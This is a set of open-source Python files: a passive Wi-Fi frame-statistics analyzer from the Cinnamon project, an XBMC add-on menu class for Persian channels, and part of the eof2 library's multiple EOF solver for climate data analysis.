def createArrayForCorruptPack(self, essid, macAP, macClient, hasInfo):
self.createArrayAndUpdateInfo(macAP, macClient, Message.CORR_PACK)
if hasInfo:
self.printInfo(essid,macAP, macClient)
self.printInfoAP(essid, macAP, macClient)
self.printInfoClient(essid, macAP, macClient)
else:
self.checkEssid(macAP, macClient)
self.checkEssidAP(macAP, macClient)
self.checkEssidClient(macAP, macClient)
def checkFCS(self,p, from_DS, to_DS):
#if p.haslayer(Dot11ProbeReq):
if hasattr(p, 'Flags') and p.Flags is not None:
if p.Flags & 64 != 0:
if not from_DS and to_DS:
if hasattr(p, 'addr1') and hasattr(p, 'addr2'):
if p.addr1 != None and p.addr2 != None:
self.createArrayForCorruptPack("", p.addr1, p.addr2, False)
elif from_DS and not to_DS:
if hasattr(p, 'addr1') and hasattr(p, 'addr2'):
if p.addr1 != None and p.addr2 != None:
self.createArrayForCorruptPack("", p.addr2, p.addr1, False)
elif not from_DS and not to_DS:
if hasattr(p, 'addr1') and hasattr(p, 'addr2'):
if p.addr3 != None and p.addr2 != None:
if p.addr3 != p.addr2:
macAP = p.addr3
macClient = p.addr2
else:
macAP = p.addr3
macClient = None
self.createArrayForCorruptPack("", macAP, macClient, False)
return True
else:
return False
def checkEssid(self, macAP, macClient):
if macAP in self.essid:
self.printInfo(self.essid[macAP], macAP, macClient)
else:
self.printInfo("-", macAP, macClient)
def checkEssidAP(self, macAP, macClient):
if macAP in self.essid:
self.printInfoAP(self.essid[macAP], macAP, macClient)
else:
self.printInfoAP("-", macAP, macClient)
def checkEssidClient(self, macAP, macClient):
if macAP in self.essid:
self.printInfoClient(self.essid[macAP], macAP, macClient)
else:
self.printInfoClient("-", macAP, macClient)
def checkRoamingClient(self, macAP, macClient):
if macClient not in self.roamingClient:
self.roamingClient[macClient] = []
if macAP not in self.roamingClient[macClient]:
self.roamingClient[macClient].append(macAP)
def createArrayAndUpdateInfo(self, macAP, macClient, message, increaseNumPack=True):
#d = open("ROAMING.txt", "a")
self.createArrayInfo(macAP, macClient)
self.createArray(macAP)
self.createArray(macClient)
if message == Message.AUTH:
self.authentInfo[(macAP, macClient)] += 1
self.authent[macAP] += 1
self.authent[macClient] += 1
self.checkRoamingClient(macAP, macClient)
#d.write(macAP+" "+macClient+" AUTH \n")
elif message == Message.DEAUTH:
self.deauthentInfo[(macAP, macClient)] += 1
self.deauthent[macAP] += 1
self.deauthent[macClient] += 1
self.checkRoamingClient(macAP, macClient)
#d.write(macAP+" "+macClient+" DEAUTH \n")
elif message == Message.PROBE_REQ:
#self.probeRequest[(macAP, macClient)] += 1
self.probeRequest[macAP] += 1
self.probeRequest[macClient] += 1
elif message == Message.PROBE_RESP:
self.probeResponseInfo[(macAP, macClient)] += 1
self.probeResponse[macAP] += 1
self.probeResponse[macClient] += 1
elif message == Message.HAND_SUCC:
self.eapHandshakeSuccessInfo[(macAP, macClient)] += 1
self.eapHandshakeSuccess[macAP] += 1
self.eapHandshakeSuccess[macClient] += 1
elif message == Message.HAND_FAIL:
self.eapHandshakeFailedInfo[(macAP, macClient)] += 1
self.eapHandshakeFailed[macAP] += 1
self.eapHandshakeFailed[macClient] += 1
elif message == Message.CORR_PACK:
if increaseNumPack:
self.corruptedPack[macAP] += 1
self.corruptedPackInfo[(macAP, macClient)] += 1
self.corruptedPack[macClient] += 1
elif message == Message.RTS:
self.rtsListInfo[(macAP, macClient)] += 1
self.rtsList[macAP] += 1
self.rtsList[macClient] += 1
elif message == Message.CTS:
self.ctsListInfo[(macAP, macClient)] += 1
self.ctsList[macAP] += 1
self.ctsList[macClient] += 1
elif message == Message.ACK:
self.ackListInfo[(macAP, macClient)] += 1
self.ackList[macAP] += 1
self.ackList[macClient] += 1
elif message == Message.DATA:
if increaseNumPack:
self.dataList[macAP] += 1
self.dataListInfo[(macAP, macClient)] += 1
self.dataList[macClient] += 1
self.checkRoamingClient(macAP, macClient)
#d.write(macAP+" "+macClient+" DATA \n")
elif message == Message.BEACON:
if increaseNumPack:
self.beacon[macAP] += 1
self.beaconListInfo[(macAP, macClient)] += 1
self.beacon[macClient] += 1
elif message == Message.ASSOC_REQ:
self.associationRequest[macAP] += 1
self.associationRequestInfo[(macAP, macClient)] += 1
self.associationRequest[macClient] += 1
self.checkRoamingClient(macAP, macClient)
#d.write(macAP+" "+macClient+" ASSOC_REQ \n")
elif message == Message.ASSOC_RESP:
self.associationResponce[macAP] += 1
self.associationResponceInfo[(macAP, macClient)] += 1
self.associationResponce[macClient] += 1
elif message == Message.DISASSOC:
self.disassociation[macAP] += 1
self.disassociationInfo[(macAP, macClient)] += 1
self.disassociation[macClient] += 1
elif message == Message.OTHER:
self.otherList[macAP] += 1
self.otherListInfo[(macAP, macClient)] += 1
self.otherList[macClient] += 1
if increaseNumPack:
self.numPack[macAP] += 1
self.numPack[macClient] += 1
self.numPackInfo[(macAP, macClient)] += 1
self.checkEssid(macAP, macClient)
self.checkEssidAP(macAP, macClient)
self.checkEssidClient(macAP, macClient)
#d.close()
def setFrequency(self, p, addr1, addr2):
signal_decoded = ord(p.notdecoded[-2:-1])
packet_signal = -(256 - signal_decoded)
self.checkFrequence(addr1, addr2, packet_signal)
def sniffmgmt(self,p):
from_DS = None
to_DS = None
if p.haslayer(Dot11Elt):
try:
self.checkChannel(p.addr2, ord(p[Dot11Elt:3].info))
except Exception, e:
self.fileLog = open("log.log", "a")
self.fileLog.write(str(e))
self.fileLog.close()
if hasattr(p, 'FCfield') and p.FCfield is not None:
DS = p.FCfield & 0x3
to_DS = DS & 0x1 != 0
from_DS = DS & 0x2 != 0
retry = p.FCfield & 0x8
if self.contForAP > 10:
isCorrupted = self.checkFCS(p, from_DS, to_DS)
if isCorrupted:
return
#isCorrupted = False
elif not isCorrupted:
activeAp = 0
if p.haslayer(Dot11) and hasattr(p, 'info'):
#ssid = ( len(p.info) > 0 and p.info != "\x00" ) and p.info or '<hidden>'
activeAp = 1
if p.addr3 not in self.apPresent:
self.apPresent.insert(0,p.addr3)
#self.apPresent[p.addr3] = []
self.essid[p.addr3] = p.info
self.setFrequency(p, p.addr3, p.addr2)
if from_DS and not to_DS and p.addr3 != AnalyzePackage.BROADCAST_ADDR and p.addr1 != AnalyzePackage.BROADCAST_ADDR:
key = "%s" % (p.addr3)
self.createArrayInfo(key, p.addr1)
self.setFrequency(p, key, p.addr1)
elif not from_DS and to_DS and p.addr2 != AnalyzePackage.BROADCAST_ADDR:
key = "%s" % (p.addr1)
if key in self.apPresent:
self.createArrayInfo(key, p.addr2)
self.setFrequency(p, key,p.addr2)
if p.haslayer(EAP):
if p[EAP].code == 3: # -----------------------> SUCCESS
if (p.addr2,p.addr1) not in self.eapHandshakeSuccess:
self.createArrayInfo(p.addr2, p.addr1)
if not from_DS and to_DS:
self.createArrayAndUpdateInfo(p.addr1, p.addr2, Message.HAND_SUCC)
self.setFrequency(p, p.addr1, p.addr2)
#self.checkChannel(p.addr2, p.Channel)
elif from_DS and not to_DS:
self.createArrayAndUpdateInfo(p.addr2, p.addr1, Message.HAND_SUCC)
self.setFrequency(p, p.addr2, p.addr1)
#self.checkChannel(p.addr1, p.Channel)
elif not from_DS and not to_DS:
self.createArrayAndUpdateInfo(p.addr3, p.addr2, Message.HAND_SUCC)
self.setFrequency(p, p.addr3, p.addr2)
#self.checkChannel(p.addr2, p.Channel)
return
elif p[EAP].code == 4: # --------------------> FAILED
if not from_DS and to_DS:
self.createArrayAndUpdateInfo(p.addr1, p.addr2, Message.HAND_FAIL)
self.setFrequency(p, p.addr1, p.addr2)
#self.checkChannel(p.addr2, p.Channel)
elif from_DS and not to_DS:
self.createArrayAndUpdateInfo(p.addr2, p.addr1, Message.HAND_FAIL)
self.setFrequency(p, p.addr2, p.addr1)
#self.checkChannel(p.addr1, p.Channel)
elif not from_DS and not to_DS:
self.createArrayAndUpdateInfo(p.addr3, p.addr2, Message.HAND_FAIL)
self.setFrequency(p, p.addr3, p.addr2)
#self.checkChannel(p.addr2, p.Channel)
return
elif hasattr(p, 'type') and p.type == 0 and hasattr(p, 'subtype') and p.subtype == 8: #BEACON
if p.addr2 not in self.apPresent:
self.apPresent.insert(0,p.addr2)
#self.apPresent[p.addr2] = []
if not from_DS and to_DS:
self.createArrayAndUpdateInfo(p.addr1, p.addr2, Message.BEACON)
self.setFrequency(p, p.addr1, p.addr2)
#self.checkChannel(p.addr2, p.Channel)
self.createArrayAndUpdateInfo(p.addr1, p.addr3, Message.BEACON, False)
self.setFrequency(p, p.addr1, p.addr3)
#self.checkChannel(p.addr3, p.Channel)
elif from_DS and not to_DS:
self.createArrayAndUpdateInfo(p.addr2, p.addr1, Message.BEACON)
self.setFrequency(p, p.addr2, p.addr1)
#self.checkChannel(p.addr1, p.Channel)
self.createArrayAndUpdateInfo(p.addr2, p.addr3, Message.BEACON, False)
self.setFrequency(p, p.addr2, p.addr3)
#self.checkChannel(p.addr3, p.Channel)
elif not from_DS and not to_DS:
isDifferent = False
if hasattr(p, 'addr2') and hasattr(p, 'addr3'):
if p.addr3 != p.addr2:
isDifferent = True
self.createArrayAndUpdateInfo(p.addr3, p.addr2, Message.BEACON)
self.setFrequency(p, p.addr3, p.addr2)
#self.checkChannel(p.addr2, p.Channel)
if not isDifferent:
self.createArrayAndUpdateInfo(p.addr3, None, Message.BEACON)
else:
self.createArrayAndUpdateInfo(p.addr3, p.addr1, Message.BEACON, False)
self.setFrequency(p, p.addr3, p.addr1)
#self.checkChannel(p.addr1, p.Channel)
return
#elif hasattr(p, 'type') and p.type == 2 and hasattr(p, 'subtype') and p.subtype == 0: #DATA
elif hasattr(p, 'type') and p.type == 2: #DATA
isDifferent = False
if not from_DS and to_DS:
if p.addr1 != p.addr2:
isDifferent = True
self.createArrayAndUpdateInfo(p.addr1, p.addr2, Message.DATA)
self.setFrequency(p, p.addr1, p.addr2)
#self.checkChannel(p.addr2, p.Channel)
if not isDifferent:
self.createArrayAndUpdateInfo(p.addr1, p.addr3, Message.DATA)
else:
if p.addr1 != p.addr3:
self.createArrayAndUpdateInfo(p.addr1, p.addr3, Message.DATA, False)
self.setFrequency(p, p.addr1, p.addr3)
#self.checkChannel(p.addr3, p.Channel)
elif from_DS and not to_DS:
if p.addr1 != p.addr2:
isDifferent = True
self.createArrayAndUpdateInfo(p.addr2, p.addr1, Message.DATA)
self.setFrequency(p, p.addr2, p.addr1)
#self.checkChannel(p.addr1, p.Channel)
if not isDifferent:
self.createArrayAndUpdateInfo(p.addr2, p.addr3, Message.DATA)
else:
if p.addr2 != p.addr3:
self.createArrayAndUpdateInfo(p.addr2, p.addr3, Message.DATA, False)
self.setFrequency(p, p.addr2, p.addr3)
#self.checkChannel(p.addr3, p.Channel)
elif not from_DS and not to_DS:
if hasattr(p, 'addr2') and hasattr(p, 'addr3'):
if p.addr3 != p.addr2:
isDifferent = True
self.createArrayAndUpdateInfo(p.addr3, p.addr2, Message.DATA)
self.setFrequency(p, p.addr3, p.addr2)
#self.checkChannel(p.addr2, p.Channel)
if not isDifferent:
self.createArrayAndUpdateInfo(p.addr3, p.addr1, Message.DATA)
self.setFrequency(p, p.addr3, p.addr1)
#self.checkChannel(p.addr1, p.Channel)
else:
if p.addr1 != p.addr3:
self.createArrayAndUpdateInfo(p.addr3, p.addr1, Message.DATA, False)
self.setFrequency(p, p.addr3, p.addr1)
#self.checkChannel(p.addr1, p.Channel)
return
elif hasattr(p, 'type') and p.type == 1 and hasattr(p, 'subtype') and p.subtype == 11: #RTS
macAP = p.addr2
macClient = p.addr1
if p.addr1 in self.apPresent:
macAP = p.addr1
macClient = p.addr2
self.createArrayAndUpdateInfo(macAP, macClient, Message.RTS)
self.setFrequency(p, macAP, macClient)
#self.checkChannel(macClient, p.Channel)
return
elif hasattr(p, 'type') and p.type == 1 and hasattr(p, 'subtype') and p.subtype == 12: #CTS
if p.addr1 != None:
if p.addr1 in self.apPresent:
self.createArrayAndUpdateInfo(p.addr1, p.addr2, Message.CTS)
self.setFrequency(p, p.addr1, p.addr2)
#self.checkChannel(p.addr2, p.Channel)
else:
self.createArrayAndUpdateInfo(p.addr2, p.addr1, Message.CTS)
self.setFrequency(p, p.addr2, p.addr1)
#self.checkChannel(p.addr1, p.Channel)
return
elif hasattr(p, 'type') and p.type == 1 and hasattr(p, 'subtype') and p.subtype == 13: #ACK
if p.addr1 != None:
if p.addr1 in self.apPresent:
self.createArrayAndUpdateInfo(p.addr1, p.addr2, Message.ACK)
self.setFrequency(p, p.addr1, p.addr2)
#self.checkChannel(p.addr2, p.Channel)
else:
self.createArrayAndUpdateInfo(p.addr2, p.addr1, Message.ACK)
self.setFrequency(p, p.addr2, p.addr1)
#self.checkChannel(p.addr1, p.Channel)
return
elif hasattr(p, 'type') and p.type == 0 and hasattr(p, 'subtype') and p.subtype == 11: #AUTH
if retry == 0 and p.addr2 != p.addr3:
macAP = p.addr1
macClient = p.addr2
else:
#Per qualche ragione avevo messo p.addr2 != p.addr3 come condizione al primo if al posto di quello scritto ora... se dovesse servire
if p.addr2 in self.apPresent:
macAP = p.addr2
macClient = p.addr1
else:
macAP = p.addr1
macClient = p.addr2
self.createArrayAndUpdateInfo(macAP, macClient, Message.AUTH)
self.setFrequency(p, macAP, macClient)
#self.checkChannel(macClient, p.Channel)
return
elif hasattr(p, 'type') and p.type == 0 and hasattr(p, 'subtype') and p.subtype == 0: #ASSOC_REQ
macAP = p.addr1
macClient = p.addr2
self.createArrayAndUpdateInfo(macAP, macClient, Message.ASSOC_REQ)
self.setFrequency(p, macAP, macClient)
#self.checkChannel(macClient, p.Channel)
return
elif hasattr(p, 'type') and p.type == 0 and hasattr(p, 'subtype') and p.subtype == 1: #ASSOC_RESP
macAP = p.addr1
macClient = p.addr2
self.createArrayAndUpdateInfo(macAP, macClient, Message.DISASSOC)
self.setFrequency(p, macAP, macClient)
#self.checkChannel(macClient, p.Channel)
return
elif hasattr(p, 'type') and p.type == 0 and hasattr(p, 'subtype') and p.subtype == 10: #DISASSOC
if p.addr1 in self.apPresent:
macAP = p.addr1
macClient = p.addr2
else:
macAP = p.addr2
macClient = p.addr1
self.createArrayAndUpdateInfo(macAP, macClient, Message.ASSOC_RESP)
self.setFrequency(p, macAP, macClient)
#self.checkChannel(macClient, p.Channel)
return
elif hasattr(p, 'type') and hasattr(p, 'subtype') and p.type == 0 and p.subtype == 12: #DEAUTH
if p.addr1 in self.apPresent:
macAP = p.addr1
macClient = p.addr2
else:
macAP = p.addr2
macClient = p.addr1
self.createArrayAndUpdateInfo(macAP, macClient, Message.DEAUTH)
self.setFrequency(p, macAP, macClient)
#self.checkChannel(macClient, p.Channel)
return
elif hasattr(p, 'type') and p.type == 0 and hasattr(p, 'subtype') and p.subtype == 4: #PROBE_REQ
macAP = p.addr1
macClient = p.addr2
if macAP in self.essid:
p.info = self.essid[macAP]
if (p.info,macClient) not in self.probeRequest:
self.probeRequest[(p.info,macClient)] = 0
self.probeRequest[(p.info,macClient)] += 1
self.createArrayAndUpdateInfo(macAP, macClient, Message.PROBE_REQ)
self.setFrequency(p, macAP,macClient)
#self.checkChannel(macClient, p.Channel)
return
elif hasattr(p, 'type') and p.type == 0 and hasattr(p, 'subtype') and p.subtype == 5: #PROBE_RESP
if p.addr2 != None:
self.createArrayAndUpdateInfo(p.addr2, p.addr1, Message.PROBE_RESP)
self.setFrequency(p, p.addr2, p.addr1)
#self.checkChannel(p.addr1, p.Channel)
return
else:
isDifferent = False
if not from_DS and to_DS:
if p.addr1 != p.addr2:
isDifferent = True
self.createArrayAndUpdateInfo(p.addr1, p.addr2, Message.OTHER)
self.setFrequency(p, p.addr1, p.addr2)
#self.checkChannel(p.addr2, p.Channel)
if not isDifferent:
self.createArrayAndUpdateInfo(p.addr1, p.addr3, Message.OTHER)
else:
if p.addr1 != p.addr3:
self.createArrayAndUpdateInfo(p.addr1, p.addr3, Message.OTHER, False)
self.setFrequency(p, p.addr1, p.addr3)
#self.checkChannel(p.addr3, p.Channel)
elif from_DS and not to_DS:
if p.addr1 != p.addr2:
isDifferent = True
self.createArrayAndUpdateInfo(p.addr2, p.addr1, Message.OTHER)
self.setFrequency(p, p.addr2, p.addr1)
#self.checkChannel(p.addr1, p.Channel)
if not isDifferent:
self.createArrayAndUpdateInfo(p.addr2, p.addr3, Message.OTHER)
else:
if p.addr2 != p.addr3:
self.createArrayAndUpdateInfo(p.addr2, p.addr3, Message.OTHER, False)
self.setFrequency(p, p.addr2, p.addr3)
#self.checkChannel(p.addr3, p.Channel)
elif not from_DS and not to_DS:
if hasattr(p, 'addr2') and hasattr(p, 'addr3'):
if p.addr3 != p.addr2:
isDifferent = True
self.createArrayAndUpdateInfo(p.addr3, p.addr2, Message.OTHER)
self.setFrequency(p, p.addr3, p.addr2)
#self.checkChannel(p.addr2, p.Channel)
if not isDifferent:
self.createArrayAndUpdateInfo(p.addr3, p.addr1, Message.OTHER)
else:
if p.addr1 != p.addr3:
self.createArrayAndUpdateInfo(p.addr3, p.addr1, Message.OTHER, False)
self.setFrequency(p, p.addr3, p.addr1)
#self.checkChannel(p.addr1, p.Channel)
"""if hasattr(p, 'addr2') and hasattr(p, 'addr3') and hasattr(p, 'addr1') and hasattr(p, 'type') and hasattr(p, 'subtype'):
self.fileLog = open(self.titleLog, "w")
self.fileLog.write("TYPE - SUBTYPE: ")
self.fileLog.write(str(p.type)+ " " + str(p.subtype)+"\n")
self.fileLog.write("ADDRESS: ")
self.fileLog.write(str(p.addr1)+" - " + str(p.addr2)+" - " + str(p.addr3)+"\n")
self.fileLog.write("FROM_DS - TO_DS: ")
self.fileLog.write(str(from_DS)+ " "+ str(to_DS))
self.fileLog.write("\n------------------------------------------------------------------\n\n")
self.fileLog.close()"""
else:
if p.haslayer(Dot11) and hasattr(p, 'info'):
#ssid = ( len(p.info) > 0 and p.info != "\x00" ) and p.info or '<hidden>'
activeAp = 1
if p.addr3 not in self.apPresent:
self.apPresent.insert(0,p.addr3)
#self.apPresent[p.addr3] = []
self.essid[p.addr3] = p.info
self.createArrayAndUpdateInfo(p.addr3, "", Message.NUM_PACK)
self.setFrequency(p, p.addr3, p.addr2)
#self.checkChannel(p.addr2, p.Channel)
self.contForAP += 1
if hasattr(p, 'type') and p.type == 0 and hasattr(p, 'subtype') and p.subtype == 8: #BEACON
if p.addr2 not in self.apPresent:
self.apPresent.insert(0,p.addr2)
#self.apPresent[p.addr2] = []
if not from_DS and to_DS:
self.createArrayAndUpdateInfo(p.addr1, p.addr2, Message.BEACON)
self.setFrequency(p, p.addr1, p.addr2)
#self.checkChannel(p.addr2, p.Channel)
self.createArrayAndUpdateInfo(p.addr1, p.addr3, Message.BEACON, False)
self.setFrequency(p, p.addr1, p.addr3)
#self.checkChannel(p.addr3, p.Channel)
elif from_DS and not to_DS:
self.createArrayAndUpdateInfo(p.addr2, p.addr1, Message.BEACON)
self.setFrequency(p, p.addr2, p.addr1)
#self.checkChannel(p.addr1, p.Channel)
self.createArrayAndUpdateInfo(p.addr2, p.addr3, Message.BEACON, False)
self.setFrequency(p, p.addr2, p.addr3)
#self.checkChannel(p.addr3, p.Channel)
elif not from_DS and not to_DS:
isDifferent = False
if p.addr3 != p.addr2:
isDifferent = True
self.createArrayAndUpdateInfo(p.addr3, p.addr2, Message.BEACON)
self.setFrequency(p, p.addr3, p.addr2)
#self.checkChannel(p.addr2, p.Channel)
if not isDifferent:
self.createArrayAndUpdateInfo(p.addr3, None, Message.BEACON)
else:
self.createArrayAndUpdateInfo(p.addr3, p.addr1, Message.BEACON, False)
self.setFrequency(p, p.addr3, p.addr1)
#self.checkChannel(p.addr1, p.Channel)
self.contForAP += 1
return
|
nananan/Cinnamon
|
analyzePackage.py
|
Python
|
gpl-3.0
| 39,675
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
This file is part of XBMC Mega Pack Addon.
Copyright (C) 2014 Wolverine (xbmcmegapack@gmail.com)
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License along
with this program. If not, see http://www.gnu.org/licenses/gpl-3.0.html
"""
class Languages_Persian():
'''Class that manages this specific menu context.'''
def open(self, plugin, menu):
menu.add_xplugins(plugin.get_xplugins(dictionaries=["Channels",
"Events", "Live", "Movies", "Sports", "TVShows"],
languages=["Persian"]))
|
xbmcmegapack/plugin.video.megapack.dev
|
resources/lib/menus/home_languages_persian.py
|
Python
|
gpl-3.0
| 1,111
|
"""Multiple EOF analysis for :py:mod:`numpy` array data."""
# (c) Copyright 2010-2012 Andrew Dawson. All Rights Reserved.
#
# This file is part of eof2.
#
# eof2 is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# eof2 is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# for more details.
#
# You should have received a copy of the GNU General Public License
# along with eof2. If not, see <http://www.gnu.org/licenses/>.
import numpy as np
import numpy.ma as ma
from eofsolve import EofSolver
from errors import EofError
class MultipleEofSolver(object):
"""Multiple EOF analysis (:py:mod:`numpy` interface)."""
def __init__(self, *datasets, **kwargs):
"""Create a MultipleEofSolver object.
The EOF solution is computed at initialization time. Method
calls are used to retrieve computed quantities.
**Arguments:**
*\*datasets*
One or more :py:class:`numpy.ndarray`s or
:py:class:`numpy.ma.core.MasekdArray`s with two or more
dimensions containing the data to be analysed. The first
dimension of each array is assumed to represent time.
Missing values are permitted, either in the form of masked
arrays, or the value :py:attr:`numpy.nan`. Missing values
must be constant with time (e.g., values of an oceanographic
field over land).
**Optional arguments:**
*weights*
A sequence of arrays of weights whose shapes are compatible
with those of the input data sets. The weights can have the
same shape as the input data set or a shape compatible with
a an array broadcast operation (ie. the shape of the weights
can match the rightmost parts of the shape of the input data
set). If none of the input data sets require weighting then
the single value *None* may be used. Defaults to *None* (no
weighting for any data set).
*center*
If *True*, the mean along the first axis of the input data
set (the time-mean) will be removed prior to analysis. If
*False*, the mean along the first axis will not be removed.
Defaults to *True* (mean is removed). Generally this option
should be set to *True* as the covariance interpretation
relies on input data being anomalies with a time-mean of 0.
A valid reson for turning this off would be if you have
already generated an anomaly data set. Setting to *True* has
the useful side-effect of propagating missing values along
the time-dimension, ensuring the solver will work even if
missing values occur at different locations at different
times.
*ddof*
'Delta degrees of freedom'. The divisor used to normalize
the covariance matrix is *N - ddof* where *N* is the
number of samples. Defaults to *1*.
"""
# Define valid keyword arguments and their default values. This method
# is required since Python 2.7 cannot accept a variable argument list
# followed by a set of keyword arguments. For some reason both must be
# variable.
keywords = {"weights": None, "center": True, "ddof": 1}
for kwarg in kwargs.keys():
if kwarg not in keywords.keys():
raise EofError("invalid argument: %s" % kwarg)
weights = kwargs.get("weights", keywords["weights"])
center = kwargs.get("center", keywords["center"])
ddof = kwargs.get("ddof", keywords["ddof"])
# Record the number of datasets provided.
self._ndatasets = len(datasets)
# Initialise instance variables dealing with dataset shapes.
self._multirecords = list()
self._multishapes = list()
self._multislicers = list()
self._multichannels = list()
self._multidtypes = list()
slicebegin = 0
for dataset in datasets:
records = dataset.shape[0]
shape = dataset.shape[1:]
channels = np.product(shape)
slicer = slice(slicebegin, slicebegin+channels)
slicebegin += channels
self._multirecords.append(records)
self._multishapes.append(shape)
self._multislicers.append(slicer)
self._multichannels.append(channels)
self._multidtypes.append(dataset.dtype)
# Check that all fields have the same time dimension.
if not (np.array(self._multirecords) == self._multirecords[0]).all():
raise EofError("all datasets must have the same first dimension")
# Get the dtype that will be used for the data and weights. This will
# be the 'highest' dtype of those passed.
dtype = sorted(self._multidtypes, reverse=True)[0]
# Form a full array to pass to the EOF solver consisting of all the
# flat inputs.
nt = self._multirecords[0]
ns = self._multichannels.sum()
dataset = ma.empty([nt, ns], dtype=dtype)
for iset in xrange(self._ndatasets):
slicer = self._multislicers[iset]
channels = self._multichannels[iset]
dataset[:, slicer] = datasets[iset].reshape([nt, channels])
# Construct an array of weights the same shape as the data array.
if weights is not None:
if len(weights) != self._ndatasets:
raise EofError("number of weights and datasets differs")
if not filter(lambda i: False if i is None else True, weights):
# If every entry in the weights list is None then just pass
# None to the EofSolver __init__ method.
warr = None
else:
# Construct a spatial weights array.
warr = np.empty([1, ns], dtype=dtype)
for iset in xrange(self._ndatasets):
slicer = self._multislicers[iset]
if weights[iset] is None:
# If this dataset has no weights use 1 for the weight
# of all elements.
warr[:, slicer] = 1.
else:
# Otherwise use the weights. These need to be
# conformed to the correct dimensions.
channels = self._multichannels[iset]
try:
warr[:, slicer] = np.broadcast_arrays(
datasets[iset][0],
weights[iset])[1].reshape([channels])
except ValueError:
raise EofError("weights are invalid")
else:
# Just pass None if none of the input datasets have associated
# weights.
warr = None
# Create an EofSolver object to handle the computations.
self._solver = EofSolver(dataset, weights=warr, center=center, ddof=1)
def _unwrap(self, modes):
"""Split a returned mode field into component parts."""
nmodes = modes.shape[0]
modeset = [modes[:, slicer].reshape((nmodes,)+shape) \
for slicer, shape in zip(self._multislicers, self._multishapes)]
return modeset
def pcs(self, pcscaling=0, npcs=None):
"""Principal component time series (PCs).
Returns an array where the columns are the ordered PCs.
**Optional arguments:**
*pcscaling*
Set the scaling of the retrieved PCs. The following
values are accepted:
* *0* : Un-scaled PCs (default).
* *1* : PCs are scaled to unit variance (divided by the
square-root of their eigenvalue).
* *2* : PCs are multiplied by the square-root of their
eigenvalue.
*npcs* : Number of PCs to retrieve. Defaults to all the PCs.
"""
return self._solver.pcs(pcscaling, npcs)
def eofs(self, eofscaling=0, neofs=None):
"""Empirical orthogonal functions (EOFs).
Returns arrays with the ordered EOFs along the first
dimension.
**Optional arguments:**
*eofscaling*
Sets the scaling of the EOFs. The following values are
accepted:
* *0* : Un-scaled EOFs (default).
* *1* : EOFs are divided by the square-root of their
eigenvalues.
* *2* : EOFs are multiplied by the square-root of their
eigenvalues.
*neofs* -- Number of EOFs to return. Defaults to all EOFs.
"""
modes = self._solver.eofs(eofscaling, neofs)
return self._unwrap(modes)
def eigenvalues(self, neigs=None):
"""Eigenvalues (decreasing variances) associated with each EOF.
**Optional argument:**
*neigs*
Number of eigenvalues to return. Defaults to all
eigenvalues.
"""
return self._solver.eigenvalues(neigs)
def eofsAsCorrelation(self, neofs=None):
"""
EOFs scaled as the correlation of the PCs with the original
field.
**Optional argument:**
*neofs*
Number of EOFs to return. Defaults to all EOFs.
"""
modes = self._solver.eofsAsCorrelation(neofs)
return self._unwrap(modes)
def eofsAsCovariance(self, neofs=None, pcscaling=1):
"""
EOFs scaled as the covariance of the PCs with the original
field.
**Optional arguments:**
*neofs*
Number of EOFs to return. Defaults to all EOFs.
*pcscaling*
Set the scaling of the PCs used to compute covariance. The
following values are accepted:
* *0* : Un-scaled PCs.
* *1* : PCs are scaled to unit variance (divided by the
square-root of their eigenvalue) (default).
* *2* : PCs are multiplied by the square-root of their
eigenvalue.
"""
modes = self._solver.eofsAsCovariance(neofs, pcscaling)
return self._unwrap(modes)
def varianceFraction(self, neigs=None):
"""Fractional EOF variances.
The fraction of the total variance explained by each EOF. This
is a value between 0 and 1 inclusive.
**Optional argument:**
*neigs*
Number of eigenvalues to return the fractional variance for.
Defaults to all eigenvalues.
"""
return self._solver.varianceFraction(neigs)
def totalAnomalyVariance(self):
"""
Total variance associated with the field of anomalies (the sum
of the eigenvalues).
"""
return self._solver.totalAnomalyVariance()
def reconstructedField(self, neofs):
"""Reconstructed data field based on a subset of EOFs.
If weights were passed to the
:py:class:`~eof2.MultipleEofSolver` instance then the returned
reconstructed field will be automatically un-weighted. Otherwise
the returned reconstructed field will be weighted in the same
manner as the input to the
:py:class:`~eof2.MultipleEofSolver` instance.
**Argument:**
*neofs*
Number of EOFs to use for the reconstruction.
"""
rf = self._solver.reconstructedField(neofs)
return self._unwrap(rf)
def northTest(self, neigs=None, vfscaled=False):
"""Typical errors for eigenvalues.
The method of North et al. (1982) is used to compute the typical
error for each eigenvalue. It is assumed that the number of
times in the input data set is the same as the number of
independent realizations. If this assumption is not valid then
the result may be inappropriate.
**Optional arguments:**
*neigs*
The number of eigenvalues to return typical errors for.
Defaults to typical errors for all eigenvalues.
*vfscaled*
If *True* scale the errors by the sum of the eigenvalues.
This yields typical errors with the same scale as the
values returned by the
:py:meth:`~eof2.MultipleEofSolver.varianceFraction`
method. If *False* then no scaling is done. Defaults to
*False* (no scaling).
**References**
North, G. R., T. L. Bell, R. F. Cahalan, and F. J. Moeng, 1982:
"Sampling errors in the estimation of empirical orthogonal
functions", *Monthly Weather Review*, **110**, pages 669-706.
"""
return self._solver.northTest(neigs, vfscaled)
def getWeights(self):
"""Weights used for the analysis."""
w = self._solver.getWeights()
return self._unwrap(w)
def projectField(self, *fields, **kwargs):
"""Project a set of fields onto the EOFs.
Given a set of fields, projects them onto the EOFs to generate
a corresponding set of time series. Fields can be projected onto
all the EOFs or just a subset. There must be the same number of
fields as were originally input into the
:py:class:`~eof2.MultipleEofSolver` instance, and each field
must have the same corresponding spatial dimensions (including
missing values in the same places). The fields may have a
different length time dimension to the original input fields (or
no time dimension at all).
**Argument:**
*\*fields*
One or more fields to project onto the EOFs. The number of
fields must be the same as the number of fields used to
initialize the :py:class:`~eof2.MultipleEofSolver`
instance.
**Optional arguments:**
*missing*
The missing value for all fields, or a list of the
missing value for each field. If not supplied no particular
value is assumed to be missing. Note that if
:py:attr:`numpy.nan` is used to represent missing values
then this option does not need to be used as this case is
handled automatically by the solver.
